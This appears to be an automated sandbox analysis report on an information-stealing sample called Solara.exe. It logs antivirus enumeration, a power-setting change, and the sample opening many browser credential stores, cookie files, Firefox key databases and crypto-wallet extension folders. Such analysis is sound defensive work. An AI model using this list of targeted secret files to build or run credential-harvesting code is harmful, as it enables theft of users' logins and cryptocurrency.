                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0093E6D7
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Solara.exe.bin.exe, 00000002.00000003.1017938838.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996421655.0000000001262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996726708.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172359493.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996079909.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.995513345.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 2.2.Solara.exe.bin.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Solara.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2169158568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                  Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                  Source: Solara.exe.bin.exe, 00000002.00000003.974203654.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertynC
                  Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: Solara.exe.bin.exe, 00000002.00000003.974422341.00000000011F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: Solara.exe.bin.exe, 00000002.00000003.974203654.0000000001221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: Solara.exe.bin.exe, 00000002.00000003.974297220.00000000011B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: Solara.exe.bin.exe, 00000002.00000003.974203654.0000000001221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
